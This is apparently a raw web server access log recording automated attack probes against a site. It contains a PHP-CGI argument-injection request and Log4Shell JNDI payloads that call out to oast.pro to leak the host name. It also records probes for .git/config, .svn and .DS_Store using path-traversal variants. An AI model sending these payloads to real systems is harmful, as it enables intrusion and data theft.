47.114.89.255 - - [12/Mar/2026:11:03:28 +0800] "POST /themes/manage/assets/jquery-file-upload/server/php/index.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [12/Mar/2026:11:03:39 +0800] "POST /wp-cron.php?doing_wp_cron=1773284619.8914821147918701171875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
113.204.120.210 - - [12/Mar/2026:11:03:39 +0800] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 34828 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:03:42 +0800] "GET /?x=${jndi:ldap://${:-963}${:-592}.${hostName}.uri.d6p2mj9a793ivu2f5vm06ac9qhsz5hbfm.oast.pro/a} HTTP/1.1" 200 34828 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:03:43 +0800] "GET / HTTP/1.1" 301 5 "${jndi:ldap://${:-963}${:-592}.${hostName}.referer.d6p2mj9a793ivu2f5vm0keo7uoyqjdfwb.oast.pro}" "${jndi:ldap://${:-963}${:-592}.${hostName}.useragent.d6p2mj9a793ivu2f5vm0r5kx65eju4tdh.oast.pro}"
113.204.120.210 - - [12/Mar/2026:11:03:45 +0800] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 200 157152 "${jndi:ldap://127.0.0.1#.${hostName}.referer.d6p2mj9a793ivu2f5vm0zuuyb1tc7ttp7.oast.pro}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.d6p2mj9a793ivu2f5vm0uity551s4p79s.oast.pro}"
113.204.120.210 - - [12/Mar/2026:11:03:49 +0800] "GET /.DS_Store HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:03:53 +0800] "GET /.svn/entries HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:03:55 +0800] "GET /static../.git/config HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:03:56 +0800] "GET /js../.git/config HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:03:57 +0800] "GET /images../.git/config HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:03:57 +0800] "GET /.git/config HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
113.204.120.210 - - [12/Mar/2026:11:04:00 +0800] "GET /img../.git/config HTTP/1.1" 404 8947 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
